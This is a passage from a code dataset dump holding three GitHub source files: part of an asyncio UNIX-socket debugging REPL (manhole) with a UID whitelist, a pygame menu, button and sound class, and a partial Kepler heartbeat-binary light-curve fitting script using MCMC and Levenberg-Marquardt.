= await self.execute(codeobj)\n except Exception:\n await self.send_exception()\n return\n else:\n await self.send_output(value, stdout)\n\n async def write_prompt(self) -> None:\n writer = self.writer\n\n if self.compiler.is_partial_command():\n writer.write(b\"... \")\n else:\n writer.write(b\">>> \")\n\n await writer.drain()\n\n async def read_command(self) -> Optional[CodeType]:\n \"\"\"Read a command from the user line by line.\n\n Returns a code object suitable for execution.\n \"\"\"\n\n reader = self.reader\n\n line = await reader.readline()\n if line == b\"\":\n raise ConnectionResetError()\n\n try:\n # skip the newline to make CommandCompiler work as advertised\n codeobj = self.compiler(line.rstrip(b\"\\n\"))\n except SyntaxError:\n await self.send_exception()\n return None\n\n return codeobj\n\n async def send_output(self, value: str, stdout: str) -> None:\n \"\"\"Write the output or value of the expression back to user.\n\n >>> 5\n 5\n >>> print('cash rules everything around me')\n cash rules everything around me\n \"\"\"\n\n writer = self.writer\n\n if value is not None:\n writer.write(f\"{value!r}\\n\".encode(\"utf-8\"))\n\n if stdout:\n writer.write(stdout.encode(\"utf-8\"))\n\n await writer.drain()\n\n def close(self) -> None:\n if self.running:\n self.writer.close()\n self.running = False\n\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n \"\"\"Main entry point for an interpreter session with a single client.\"\"\"\n self.reader = reader\n self.writer = writer\n self.running = True\n\n if self.banner:\n writer.write(self.banner)\n await writer.drain()\n\n while self.running:\n try:\n await self.handle_one_command()\n except ConnectionResetError:\n writer.close()\n self.running = False\n break\n except Exception:\n log.exception(\"Exception in manhole REPL\")\n self.writer.write(traceback.format_exc())\n await self.writer.drain()\n\n\nclass InterpreterFactory:\n namespace: Dict[str, Any]\n banner: bytes\n loop: asyncio.AbstractEventLoop\n interpreter_class: Type[Interpreter]\n clients: List[Interpreter]\n whitelist: Set[int]\n _conn_id: int\n\n def __init__(self, namespace: Dict[str, Any], banner: Union[bytes, str],\n interpreter_class: Type[Interpreter], loop: asyncio.AbstractEventLoop,\n whitelist: Set[int]) -> None:\n self.namespace = namespace or {}\n self.banner = banner\n self.loop = loop\n self.interpreter_class = interpreter_class\n self.clients = []\n self.whitelist = whitelist\n self._conn_id = 0\n\n @property\n def conn_id(self) -> int:\n self._conn_id += 1\n return self._conn_id\n\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter\n ) -> None:\n sock = writer.transport.get_extra_info(\"socket\")\n creds = sock.getsockopt(SOL_SOCKET, SO_PEERCRED, struct.calcsize('3i'))\n pid, uid, gid = struct.unpack('3i', creds)\n user_info = pwd.getpwuid(uid)\n username = f\"{user_info.pw_name} ({uid})\" if user_info and user_info.pw_name else uid\n if len(self.whitelist) > 0 and uid not in self.whitelist:\n writer.write(b\"You are not whitelisted to use the manhole.\")\n log.warning(f\"Non-whitelisted user {username} tried to connect from PID {pid}\")\n await writer.drain()\n writer.close()\n return\n\n namespace = {**self.namespace}\n if AWAIT_TRANSFORM:\n namespace[AWAIT_FUNC_NAME] = AWAIT_FALLBACK\n interpreter = self.interpreter_class(namespace=namespace, banner=self.banner,\n loop=self.loop)\n namespace[\"exit\"] = interpreter.close\n self.clients.append(interpreter)\n conn_id = self.conn_id\n\n log.info(f\"Manhole connection OPENED: {conn_id} from PID {pid} by {username}\")\n await asyncio.ensure_future(interpreter(reader, writer))\n log.info(f\"Manhole connection CLOSED: {conn_id} from PID {pid} by {username}\")\n self.clients.remove(interpreter)\n\n\nasync def start_manhole(path: str, banner: str = \"\", namespace: Optional[Dict[str, Any]] = None,\n loop: asyncio.AbstractEventLoop = None, whitelist: Set[int] = None,\n ) -> Tuple[asyncio.AbstractServer, Callable[[], None]]:\n \"\"\"\n Starts a manhole server on a given UNIX address.\n\n Args:\n path: The path to create the UNIX socket at.\n banner: The banner to show when clients connect.\n namespace: The globals to provide to connected clients.\n loop: The asyncio event loop to use.\n whitelist: List of user IDs to allow connecting.\n \"\"\"\n loop = loop or asyncio.get_event_loop()\n factory = InterpreterFactory(namespace=namespace, banner=banner,\n interpreter_class=AsyncInterpreter, loop=loop,\n whitelist=whitelist)\n server = await asyncio.start_unix_server(factory, path=path, loop=loop)\n os.chmod(path, 0o666)\n\n def stop():\n for client in factory.clients:\n client.close()\n server.close()\n\n return server, stop\n","repo_name":"Ma27/mautrix-python","sub_path":"mautrix/util/manhole.py","file_name":"manhole.py","file_ext":"py","file_size_in_byte":11696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"70514848108","text":"import pygame.font\nimport time\nfrom menu import *\nfrom PIL import Image\nimport path\n\nclass Game():\n def __init__(self,screen):\n pygame.init()\n\n self.running = True\n self.playing = False\n self.setup = True\n self.first_setup = True\n self.first_launch = True\n self.sound = Sound()\n self.button = Button(self, None, self.sound,)\n self.UP_KEY, self.DOWN_KEY, self.START_KEY, self.BACK_KEY, self.EXIT_KEY = False,False,False,False,False\n self.display = screen\n self.display_w, self.display_h = self.display.get_width(), self.display.get_height()\n path_parts = path.schrift.split('/')\n self.font_name = os.path.join(os.path.dirname(__file__), *path_parts, \"BreatheFireIi.ttf\")\n self.black, self.white = (0,0,0),(255,255,255)\n self.main_menu = MainMenu(self,self.sound,self.button)\n self.options = OptionsMenu(self,self.sound,self.button)\n self.controls = ControlsMenu(self, self.sound, self.button)\n self.credits = CreditsMenu(self,self.sound,self.button)\n self.quit = QuitMenu(self,self.sound,self.button)\n self.ending = EndScreen(self, self.sound, self.button)\n self.victory = VictoryScreen(self, self.sound, self.button)\n self.curr_menu = self.main_menu\n self.prev_menu = self.main_menu\n\n self.player_spawn = (0,0)\n self.dealer_spawn = (0,0)\n self.game_is_won = False\n self.reset_time = 0\n self.paused = False\n self.bg = False # bg = Background, for the background image in menu\n\n self.seed = int(time.time()) # Konvertiere das Datum und die Uhrzeit in einen Seed\n self.width = 150\n self.height = 150\n\n\n def check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running, self.playing = False, False\n self.curr_menu.run_display = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n self.START_KEY = True\n if event.key == pygame.K_BACKSPACE:\n self.BACK_KEY = True\n if event.key == pygame.K_DOWN or event.key == pygame.K_s:\n self.DOWN_KEY = True\n if event.key == pygame.K_UP or event.key == pygame.K_w:\n self.UP_KEY = True\n if event.key == pygame.K_ESCAPE:\n self.EXIT_KEY = True\n\n def reset_keys(self):\n self.UP_KEY, self.DOWN_KEY, self.START_KEY, self.BACK_KEY,self.EXIT_KEY = False, False, False, False,False\n\n def draw_text(self, text, size, x, y, clickable_button = True):\n font = pygame.font.Font(self.font_name, size)\n text_surface = font.render(text, True, self.white)\n text_rect = text_surface.get_rect()\n text_rect.center = (x, y)\n\n # use clickable_button = False to exclude from being added, so not being a clickable button\n if text not in Button.all_buttons and clickable_button:\n button = Button(self,text,x,y)\n button.name_rect = text_rect\n button.all_buttons[text] = button # Add the button to the class-level all_buttons dictionary\n button.set_button_pos(x,y)\n\n self.display.blit(text_surface, text_rect)\n\n def draw_text_loop(self,*args,size, x,y, distance, add = True,):\n for text in args:\n self.draw_text(text,size,x,y, add)\n y += distance\n\n def background_screenshot(self):\n self.running = True\n self.paused = True\n screenshot = pygame.surfarray.array3d(self.display)\n screenshot = screenshot.transpose([1, 0, 2])\n img = Image.fromarray(screenshot)\n img.save(f\"{path.weiteres}bg.png\")\n self.bg = True\n\nclass Button():\n all_buttons = {}\n\n def __init__(self, game, name, sound, x=0,y=0):\n self.game = game\n self.button_name = name\n self.sound = sound\n self.clicked = False\n self.already_hovered= False\n self.once = True\n self.name_rect = None\n self.button_pos = (x,y)\n self.button_rects = []\n\n def set_button_name(self, name):\n self.button_name = name\n\n def get_button_name(self):\n return self.button_name\n\n def set_button_pos(self,x,y):\n self.button_pos = (x,y)\n\n def get_button_pos(self, button):\n return self.button_pos\n\n def mouse_click(self):\n\n for name, button in Button.all_buttons.items():\n rect_value = button.name_rect\n mouse_pos = pygame.mouse.get_pos()\n\n if button.name_rect is not None and rect_value.collidepoint(mouse_pos):\n\n if not button.already_hovered:\n self.sound.play_sound(\"UPDOWN\")\n pygame.cursors.Cursor(pygame.SYSTEM_CURSOR_HAND)\n button.already_hovered = True\n\n if pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n\n self.set_button_name(button.button_name)\n self.set_button_pos(*button.get_button_pos(self))\n self.sound.play_sound(\"UPDOWN\")\n self.clicked = True\n pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)\n return True\n else:\n button.already_hovered = False\n\n if pygame.mouse.get_pressed()[0] == 0:\n self.clicked = False\n pygame.cursors.Cursor(pygame.SYSTEM_CURSOR_ARROW)\n\n\nclass Sound():\n\n music_volume = [1]\n sound_volume = [1]\n\n def __init__(self):\n pygame.mixer.init()\n self.currently_playing = None\n self.playing_music = False\n self.parent_dir = os.path.dirname(__file__)\n path_parts = path.sound.split('/')\n self.sound_dir = os.path.join(self.parent_dir, *path_parts)\n self.voice_channel = pygame.mixer.Channel(0)\n self.footsteps_channel = pygame.mixer.Channel(1)\n self.current_footsteps = True\n self.sound_effects = {}\n self.music_tracks = {}\n\n self.sound_setup()\n\n def search_file(self, file_name):\n for path, _, files in os.walk(self.sound_dir):\n if file_name in files:\n return os.path.join(path, file_name)\n\n\n def add_sound_effect(self, event, sound_filename):\n self.sound_effects[event] = sound_filename\n\n def add_music_track(self, event, music_filename):\n self.music_tracks[event] = music_filename\n\n def play_sound(self, event):\n if event in self.sound_effects:\n sound_file = pygame.mixer.Sound(self.search_file(self.sound_effects[event]))\n sound_file.set_volume(Sound.sound_volume[0])\n sound_file.play()\n\n def play_music(self, event):\n music_filename = self.music_tracks[event]\n pygame.mixer.music.set_volume(Sound.music_volume[0])\n\n if pygame.mixer.music.get_busy():\n if not self.currently_playing == music_filename: #keep it from restarting the music when the loop is called again\n pygame.mixer.music.unload()\n pygame.mixer.music.load(self.search_file(music_filename))\n pygame.mixer.music.play(-1, fade_ms = 1500)\n else:\n pygame.mixer.music.load(self.search_file(music_filename))\n pygame.mixer.music.play(-1)\n self.currently_playing = music_filename\n\n def play_voiceline(self,line):\n self.voice_channel.set_volume(Sound.sound_volume[0] * 0.9)\n voice_line = pygame.mixer.Sound(self.search_file(self.sound_effects[line]))\n if self.voice_channel.get_busy():\n self.voice_channel.stop()\n self.voice_channel.play(voice_line)\n\n def play_footsteps(self, stop=False):\n self.footsteps_channel.set_volume(Sound.sound_volume[0] * 0.4)\n if stop:\n self.footsteps_channel.stop()\n elif not self.footsteps_channel.get_busy():\n if self.current_footsteps: #switching between two sets of footsteps\n footsteps_sound = pygame.mixer.Sound(self.search_file(self.sound_effects[\"Footsteps\"]))\n else:\n footsteps_sound = pygame.mixer.Sound(self.search_file(self.sound_effects[\"Footsteps2\"]))\n self.current_footsteps = not self.current_footsteps\n self.footsteps_channel.play(footsteps_sound)\n\n def sound_setup(self):\n pygame.mixer.set_num_channels(16)\n\n ### Music ###\n self.add_music_track(\"Main Menu\" , \"1_BETT_Menue.wav\")\n self.add_music_track(\"level1\", \"2_BETT_Korianderworld.wav\")\n self.add_music_track(\"Credits\", \"4_BETT_Credits.wav\")\n self.add_music_track(\"SaveSpace\",\"Save_Space_atmo.wav\")\n self.add_music_track(\"Dungeon\",\"Dungeon_ATMO_v1.0.wav\")\n self.add_music_track(\"Moonlight\",\"Moonlight_ATMO_v1.0.wav\")\n self.add_music_track(\"Horns\",\"3_BETT_Underwaterworld2_Horns.wav\")\n\n ### Menu ###\n self.add_sound_effect(\"Gong\", \"2_SOUND_Gong_Einstieg.wav\")\n self.add_sound_effect(\"UPDOWN\", \"1_1_SOUND_Menue_YES.wav\")\n\n ### Items ###\n self.add_sound_effect(\"ItemPickUp\", \"paper_sound.wav\")\n self.add_sound_effect(\"CoinPickUp\", \"SOUND_Bling_Money1_Clear_Short.wav\")\n self.add_sound_effect(\"Echo1\",\"SOUND_Echolot_V1.wav\")\n self.add_sound_effect(\"Echo2\", \"SOUND_Echolot_V2.wav\")\n self.add_sound_effect(\"EchoPickUp\", \"SOUND_Echolot_V3.wav\")\n self.add_sound_effect(\"flame1\", \"SOUND_Fire_Flame_V1.wav\")\n self.add_sound_effect(\"flame2\", \"SOUND_Fire_Flame_V2.wav\")\n self.add_sound_effect(\"RangeUp\", \"swoosh_effect_up_shorted.wav\")\n self.add_sound_effect(\"RangeDown\", \"swoosh_effect_down_shorted.wav\")\n self.add_sound_effect(\"Key\",\"getting_key.wav\")\n self.add_sound_effect(\"DoorOpen\",\"door_open.wav\")\n self.add_sound_effect(\"DoorClosed\",\"closed_door_sound.wav\")\n self.add_sound_effect(\"FuelCharge\",\"shield_recharge.wav\")\n\n ### SHOP ###\n self.add_sound_effect(\"BuyItem\", \"SOUND_SHOP_Selection_High.wav\")\n self.add_sound_effect(\"noMoney\", \"SOUND_SHOP_No_Money.wav\")\n self.add_sound_effect(\"ShopAnytime\", \"Merchant_quote_-_Come_back_anytime-Kopie.wav\")\n self.add_sound_effect(\"ShopNoMoney\", \"Merchant_quote_-_Not_enough_cash,_stranger.ogg\")\n self.add_sound_effect(\"ShopThankYou\", \"Merchant_quote_-_Thank_you.ogg\")\n self.add_sound_effect(\"ShopBuying\", \"Merchant_quote_-_What're_ya_buyin'.ogg\")\n\n ### Ending ###\n self.add_sound_effect(\"SlowDeath\", \"darkest-dungeon-the-slow-death.mp3\")\n self.add_sound_effect(\"Overconfidence\", \"darkest-dungeon-remind-yourself-that-overconfidence.mp3\")\n self.add_sound_effect(\"Slowly\", \"darkest-dungeon-slowly-gently-1.mp3\")\n self.add_sound_effect(\"NoHope\", \"darkest-dungeon-there-can-be-no-hope-in-this-hell.mp3\")\n self.add_sound_effect(\"Dissappointment\", \"more-dust-more-ashes-more-disappointment.mp3\")\n\n ### Victory ###\n self.add_sound_effect(\"Impressive\", \"darkest-dungeon-impressive.mp3\")\n self.add_sound_effect(\"VictorySound\", \"winning_sound.wav\")\n\n ### Footsteps ###\n self.add_sound_effect(\"Footsteps\", \"single_footstep__1_.wav\")\n self.add_sound_effect(\"Footsteps2\", \"single_footstep__2_.wav\")\n","repo_name":"conradbader/das-verreckte-labyrinth","sub_path":"gameclass.py","file_name":"gameclass.py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7315652193","text":"#-*-coding:utf-8-*-\nfrom astropy.io import fits\nimport os\nimport sys\nimport glob\nimport numpy as np\nfrom PyAstronomy import pyasl\nimport matplotlib.pyplot as plt\nimport emcee\nimport corner\nimport batman\nfrom mpfit.mpfit import mpfit\n\nper = 2.666965\n\n\"\"\"\necc 離心率\ninc 傾斜(ラジアン)\nomega ペリアストロン(ラジアン)\nt0 ハートビートの開始位置\nS ハートビートの振幅\nC ハートビートのy軸位置\np 補正関数の係数\nq 補正関数の初期位相\ntp primary eclipseの中心位置\nrp 中心星に対しての2体目の星の半径\na semi-major axis\nq1 lim darkning係数1\nq2 lim darkning係数2 https://academic.oup.com/mnras/article/435/3/2152/1024138\nfp 2体目の星の光度\nts secondary eclipseの中心位置\n\"\"\"\n\n\nclass HeartBeatModel():\n def __init__(self, ecc, inc, omega, t0, S, C, p, q, rp, a, q1, q2, fp):\n self.ecc = ecc\n self.inc = inc\n self.omega = omega\n self.t0 = t0\n self.S = S\n self.C = C\n self.p = p\n self.q = q\n\n def t2ma(self, t):\n ma = (t - self.t0) / per * 2. * np.pi\n return ma\n\n def ma2ea(self, ma):\n ks = pyasl.MarkleyKESolver()\n if isinstance(ma, float):\n ea = ks.getE(ma, self.ecc)\n else:\n ea_list = [ks.getE(_ma, self.ecc) for _ma in ma]\n ea = np.array(ea_list)\n return ea\n\n def ea2ta(self, ea):\n #ta = 2. * np.arctan2(np.sqrt(1 - self.ecc) * np.cos(ea / 2.), np.sqrt(1 + self.ecc) * np.sin(ea / 2.))\n ta = 2. * np.arctan(np.sqrt((1. + self.ecc) / (1. - self.ecc)) * np.tan(ea / 2.))\n return ta\n\n def ta2ea(self, ta):\n ea = 2. * np.arctan(np.sqrt((1. - self.ecc) / (1. + self.ecc)) * np.tan(ta / 2.))\n return ea\n\n def ea2ma(self, ea):\n ma = ea - self.ecc * np.sin(ea)\n return ma\n\n def ma2t(self, ma):\n t = ma * per / 2. / np.pi + self.t0\n t = np.where(t >= per, t - per, t)\n return t\n\n def t2ta(self, t):\n ma = self.t2ma(t)\n ea = self.ma2ea(ma)\n ta = self.ea2ta(ea)\n return ta\n\n def ta2t(self, ta):\n ea = self.ta2ea(ta)\n ma = self.ea2ma(ea)\n t = self.ma2t(ma)\n return t\n\n def getEclipseTime(self):\n tp = self.ta2t(np.pi / 2. - self.omega)\n ts = self.ta2t(3. * np.pi / 2. - self.omega)\n return tp, ts\n\n def fixFunc(self, ta):\n cor_val = self.p * np.sin(ta + self.q)\n return cor_val\n\n def modelFunc(self, t):\n #時間からmean anomalyを計算\n ma = self.t2ma(t)\n #mean anomalyからeccentric anomalyを計算\n ea = self.ma2ea(ma)\n #eccentric anomalyからtrue anomalyを計算\n ta = self.ea2ta(ea)\n #減光度を求める\n numerator = 1. - 3. * np.power(np.sin(self.inc), 2.) * np.power(np.sin(ta + self.omega), 2.)\n denominator = np.power((1. - np.power(self.ecc, 2.)) / (1. + self.ecc * np.cos(ta)), 3.)\n flux = self.S * numerator / denominator + self.C #+ self.fixFunc(ta)\n return flux\n\n def test(self, t):\n #時間からmean anomalyを計算\n ma = self.t2ma(t)\n #mean anomalyからeccentric anomalyを計算\n ea = self.ma2ea(ma)\n #eccentric anomalyからtrue anomalyを計算\n ta = self.ea2ta(ea)\n #減光度を求��る\n numerator = 1. - 3. * np.power(np.sin(self.inc), 2.) * np.power(np.sin(ta - self.omega), 2.)\n denominator = np.power((1. - np.power(self.ecc, 2.)) / (1. + self.ecc * np.cos(ta)), 3.)\n flux = self.S * numerator / denominator + self.C\n return flux, ta\n\n\nclass EclipseModel():\n def __init__(self, ecc, inc, omega, t0, S, C, p, q, rp, a, q1, q2, fp):\n self.ecc = ecc\n self.inc = inc\n self.omega = omega\n self.rp = rp\n self.a = a\n self.q1 = q1\n self.q2 = q2\n self.fp = fp\n self.params = None\n\n def get_params(self, tp, ts):\n self.params = batman.TransitParams()\n #time of inferior conjunction\n self.params.t0 = tp\n #orbital period\n self.params.per = per\n #planet radius (in units of stellar radii)\n self.params.rp = self.rp\n #semi-major axis (in units of stellar radii)\n self.params.a = self.a\n #orbital inclination (in degrees)\n self.params.inc = np.rad2deg(self.inc)\n #eccentricity\n self.params.ecc = self.ecc\n #longitude of periastron (in degrees)\n self.params.w = np.rad2deg(self.omega)\n #limb darkening coefficients [u1, u2]\n u1 = 2. * np.sqrt(self.q1) * self.q2\n u2 = np.sqrt(self.q1) * (1. - 2. * self.q2)\n self.params.u = [u1, u2]\n #limb darkening model\n self.params.limb_dark = \"quadratic\"\n # #planet-to-star flux ratio\n self.params.fp = self.fp\n # #the central secondary eclipse time\n self.params.t_secondary = ts\n\n def primaryModel(self, t):\n model = batman.TransitModel(self.params, t)\n flux = model.light_curve(self.params)\n return flux\n\n def secondaryModel(self, t):\n model = batman.TransitModel(self.params, t, transittype=\"secondary\")\n flux = model.light_curve(self.params)\n return flux\n\n def getTrueAnomaly(self, t):\n model = batman.TransitModel(self.params, t)\n ta = model.get_true_anomaly()\n return ta\n\n\nclass MCMC():\n def __init__(self):\n self.param_in = [0.2640, 1.392, -0.1398, 2.54017, 0.001593, 0.9994, 0.000455, 3.52, 0.13, 5.61, 0.78, 0.76, 0.001]\n self.ndim = len(self.param_in)\n self.nwalkers = 100\n self.tot_chain = None\n self.samples = None\n\n def __lnprior__(self, ecc, inc, omega, t0, S, C, p, q, rp, a, q1, q2, fp):\n if not 0. < ecc < 0.5:\n return -np.inf\n elif not 0. <= inc < np.pi / 2.:\n return -np.inf\n elif not -np.pi / 2. <= omega < np.pi / 2.:\n return -np.inf\n elif not 2.4 <= t0 < per:\n return -np.inf\n elif not 0. <= p < 0.001:\n return -np.inf\n elif not 0. < q <= 2 * np.pi:\n return -np.inf\n elif not 0. <= rp:\n return -np.inf\n elif not 0. <= a:\n return -np.inf\n elif not 0. <= q1 <= 1.:\n return -np.inf\n elif not 0. <= q2 <= 1.:\n return -np.inf\n elif not 0. <= fp:\n return -np.inf\n else:\n return 0.0\n\n def __lnlike__(self, param, x, y, yerr):\n hbm = HeartBeatModel(*param)\n tp, ts = hbm.getEclipseTime()\n em = EclipseModel(*param)\n em.get_params(tp, ts)\n model_y = hbm.modelFunc(x) * em.primaryModel(x) * em.secondaryModel(x)\n inv_sigma2 = 1.0 / (yerr ** 2)\n lnlike = -0.5 * (np.sum((y - model_y) ** 2 * inv_sigma2 - np.log(inv_sigma2)))\n if np.isnan(lnlike):\n return -np.inf\n else:\n return lnlike\n\n def lnprob(self, param, x, y, yerr):\n lp = self.__lnprior__(*param)\n if not np.isfinite(lp):\n return -np.inf\n return lp + self.__lnlike__(param, x, y, yerr)\n\n def execute(self, stack_time, stack_flux, stack_err):\n pos = [self.param_in + 1e-4 * np.random.randn(self.ndim) for i in range(self.nwalkers)]\n sampler = emcee.EnsembleSampler(self.nwalkers, self.ndim, self.lnprob, args=(stack_time, stack_flux, stack_err))\n sampler.run_mcmc(pos, 10000)\n self.samples = sampler.chain[:, 5000:9990, :].reshape((-1, self.ndim))\n self.tot_chain = sampler.chain.reshape((-1, self.ndim))\n\n def result(self):\n label = [\"$ecc$\", \"$inc$\", \"$omega$\", \"$t0$\", \"$S$\", \"$C$\", \"$p$\", \"$q$\", \"$rp$\", \"$a$\", \"$q1$\", \"$q2$\", \"$fp$\"]\n fig = corner.corner(self.samples, labels=label)\n fig.savefig(\"corner2.png\", bbox_inches=\"tight\", pad_inches=0.0)\n np.savez(\"C:\\\\Users\\\\tajiri tomoyuki\\\\school\\\\dat\\\\fitting\\\\fitting_chain2.npz\", self.tot_chain)\n print(self.param_in)\n print(self.samples[-1])\n\n\nclass LevenbergMarquardt():\n def __init__(self):\n self.m = None\n\n def getParamInfo(self):\n parinfo = [{\"name\":\"ecc\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"inc\", \"value\":0, \"fixed\":0, \"limited\":[1, 1], \"limits\":[-np.pi, np.pi]},\n {\"name\":\"omega\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[-np.pi / 2., np.pi / 2.]},\n {\"name\":\"t0\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"S\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"C\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"p\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]},\n {\"name\":\"q\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[0., np.pi * 2.]},\n {\"name\":\"rp\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]},\n {\"name\":\"a\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]},\n {\"name\":\"q1\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[0., 1.]},\n {\"name\":\"q2\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[0., 1.]},\n {\"name\":\"fp\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]}]\n return parinfo\n\n def lightcurveFunc(self, p, fjac=None, x=None, y=None, err=None):\n hbm = HeartBeatModel(*p)\n tp, ts = hbm.getEclipseTime()\n em = EclipseModel(*p)\n em.get_params(tp, ts)\n model_y = hbm.modelFunc(x) * em.primaryModel(x) * em.secondaryModel(x)\n status = 0\n return [status, (y - model_y) / err]\n\n def execute(self, stack_time, stack_flux, stack_er):\n p0 = [0.2640, 1.392, -0.1398, 2.54017, 0.001593, 0.9994, 0.000455, 3.52, 0.13, 5.61, 0.78, 0.76, 0.001]\n parinfo = self.getParamInfo()\n fa = {\"x\":stack_time, \"y\":stack_flux, \"err\":stack_er}\n self.m = mpfit(self.lightcurveFunc, p0, functkw=fa, parinfo=parinfo)\n\n def result(self):\n #np.savez(\"C:\\\\Users\\\\tajiri tomoyuki\\\\school\\\\dat\\\\fitting\\\\LM.npz\", self.m)\n print(self.m.params)\n print(self.m.perror)\n\n\nclass ImportData():\n def __init__(self, sys_name, period):\n self.sys_name = sys_name\n self.period = period\n self.time_org = np.array([])\n self.flux_org = np.array([])\n self.cdno_org = np.array([])\n self.folded_time = None\n self.stack_time = np.array([])\n self.stack_flux = np.array([])\n self.stack_err = np.array([])\n self.datdir = \"C:\\\\Users\\\\tajiri tomoyuki\\\\school\\\\kepler\"\n\n def loadData(self, normalize=True):\n fitslist = glob.glob(os.path.join(self.datdir, self.sys_name, \"*llc.fits\"))\n for fitspath in fitslist:\n with fits.open(fitspath) as hdulist:\n t = hdulist[\"LIGHTCURVE\"].data.field(\"TIME\")\n f = hdulist[\"LIGHTCURVE\"].data.field(\"PDCSAP_FLUX\")\n c = hdulist[\"LIGHTCURVE\"].data.field(\"CADENCENO\").astype(np.uint32)\n if normalize == True:\n mid_val = np.nanmedian(f)\n f_mid = f / mid_val\n self.flux_org = np.hstack((self.flux_org, f_mid))\n else:\n self.flux_org = np.hstack((self.flux_org, f_mid))\n self.time_org = np.hstack((self.time_org, t))\n self.cdno_org = np.hstack((self.cdno_org, c))\n\n def foldTime(self):\n self.folded_time = np.mod(self.time_org, self.period)\n\n def stack(self, dev=1000):\n bin_size = self.period / dev\n for i in range(dev):\n t_min = i * bin_size\n t_max = (i + 1) * bin_size\n #一旦nanを-999に変更\n self.folded_time[np.isnan(self.folded_time)] = -999\n bin_flux = self.flux_org[np.where((t_min <= self.folded_time) & (self.folded_time < t_max))]\n self.folded_time[self.folded_time == -999] = -np.nan\n mid_time = (bin_size * (i + 0.5))\n mid_flux = np.nanmedian(bin_flux)\n flux_std = np.nanstd(bin_flux)\n self.stack_time = np.hstack((self.stack_time, mid_time))\n self.stack_flux = np.hstack((self.stack_flux, mid_flux))\n self.stack_err = np.hstack((self.stack_err, flux_std))\n\n def exportStackData(self, dev):\n self.loadData()\n self.foldTime()\n self.stack(dev=dev)\n return self.stack_time, self.stack_flux, self.stack_err\n\n\ndef maskEclipse(stack_time, stack_flux, mask=\"all\"):\n masked_flux = np.array([])\n t1_init = 0.3\n t1_fin = 0.44\n f1_init = 0.\n f1_len = 0\n t2_init = 2.07\n t2_fin = 2.21\n f2_init = 0.\n f2_len = 0\n tmp_array = np.array([])\n for t, f in zip(stack_time, stack_flux):\n if t < t1_init:\n masked_flux = np.hstack((masked_flux, f))\n elif t1_init <= t < t1_fin:\n if mask == \"all\":\n if f1_init == 0.:\n f1_init = f\n f1_len += 1\n else:\n masked_flux = np.hstack((masked_flux, f))\n elif t1_fin <= t < t2_init:\n if mask == \"all\":\n if f1_init != 0.:\n tol = (f - f1_init) / (f1_len + 1)\n cor_array = np.arange(f1_init + tol, f + tol, tol)[0 : f1_len + 1]\n cor_array = cor_array + 7e-5 * np.random.randn(f1_len + 1)\n masked_flux = np.hstack((masked_flux, cor_array))\n f1_init = 0.\n else:\n masked_flux = np.hstack((masked_flux, f))\n else:\n masked_flux = np.hstack((masked_flux, f))\n elif t2_init <= t < t2_fin:\n if f2_init == 0.:\n f2_init = f\n f2_len += 1\n elif t2_fin <= t:\n if f2_init != 0.:\n tol = (f - f2_init) / (f2_len + 1)\n cor_array = np.arange(f2_init + tol, f + tol, tol)[0 : f2_len + 1]\n cor_array = cor_array + 7e-5 * np.random.randn(f2_len + 1)\n masked_flux = np.hstack((masked_flux, cor_array))\n f2_init = 0.\n else:\n masked_flux = np.hstack((masked_flux, f))\n return masked_flux\n\ndef main():\n data = ImportData(\"003766353\", 2.666965)\n stack_time, stack_flux, stack_err = data.exportStackData(1000)\n #masked_flux = maskEclipse(stack_time, stack_flux)\n mcmc = MCMC()\n mcmc.execute(stack_time, stack_flux, stack_err)\n mcmc.result()\n\ndef main2():\n data = ImportData(\"003766353\", 2.666965)\n stack_time, stack_flux, stack_err = data.exportStackData(1000)\n lm = LevenbergMarquardt()\n lm.execute(stack_time, stack_flux, stack_err)\n lm.result()\n\ndef test():\n param = {\n \"ecc\": 0.2647,\n \"inc\": 1.415,\n \"omega\": -0.1381,\n \"t0\": 2.540566,\n \"S\": 0.001579,\n \"C\": 0.99958,\n \"p\": 0.000448996,\n \"q\": 3.48413,\n \"rp\": 0.1222,\n \"a\": 6.01312,\n \"q1\": 0.824589,\n \"q2\": 1.,\n \"fp\": 0.00085891\n }\n param = {\n \"ecc\": 0.2665,\n \"inc\": 1.5708,\n \"omega\": -0.133,\n \"t0\": 2.540964,\n \"S\": 0.00153811,\n \"C\": 1.00013668,\n \"p\": 0.000455,\n \"q\": 3.52,\n \"rp\": 0.06053899,\n \"a\": 10.0782672,\n \"q1\": 0.953831,\n \"q2\": 1.,\n \"fp\": 0.000376788\n }\n data = ImportData(\"003766353\", 2.666965)\n stack_time, stack_flux, stack_err = data.exportStackData(1000)\n #masked_flux = maskEclipse(stack_time, stack_flux)\n hbm = HeartBeatModel(**param)\n tp, ts = hbm.getEclipseTime()\n em = EclipseModel(**param)\n em.get_params(tp, ts)\n model_flux = hbm.modelFunc(stack_time) * em.primaryModel(stack_time) * em.secondaryModel(stack_time)\n fig = plt.figure()\n ax = fig.add_subplot(211)\n ax.scatter(stack_time, stack_flux, c=\"red\", s=10, marker=\"o\")\n ax.scatter(stack_time, model_flux, 